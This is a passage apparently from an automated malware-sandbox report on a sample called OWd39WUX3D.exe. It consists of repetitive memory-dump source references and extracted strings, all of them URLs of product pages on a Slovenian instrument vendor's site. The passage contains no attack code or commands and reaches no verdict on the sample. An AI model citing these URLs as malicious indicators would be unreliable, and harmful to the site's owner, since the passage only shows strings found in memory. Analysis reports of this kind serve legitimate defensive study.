binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/data-loggerji-spominske-enote/rutinske-kontrole/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/data-loggerji-spominske-enote/validacije/
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/katalogi-prospekti-brosure-dokumenti/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/katalogi-prospekti-brosure-dokumenti/kompletni-ka
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/katalogi-prospekti-brosure-dokumenti/prospekti-br
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/prenosni-rocni-merilniki/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/prenosni-rocni-merilniki/ir-termometri/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/prenosni-rocni-merilniki/merilnik-kvalitete-olja-
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/prenosni-rocni-merilniki/prenosni-merilnik-vsebno
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/prenosni-rocni-merilniki/prenosni-merilniki-ph/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/prenosni-rocni-merilniki/prenosni-merilniki-prevo
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/prenosni-rocni-merilniki/prenosni-termometri/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/prenosni-rocni-merilniki/prenosni-vlagomerji-higr
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/razdelitev-po-industrijskih-sektorjih/
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/razdelitev-po-industrijskih-sektorjih/data-logger
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/razdelitev-po-industrijskih-sektorjih/zivilska-in
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/elpro-posebne-izvedbe-temperaturnih-tipal/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/elpro-posebne-izvedbe-temperaturnih-tipal/livarski-termomete
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, 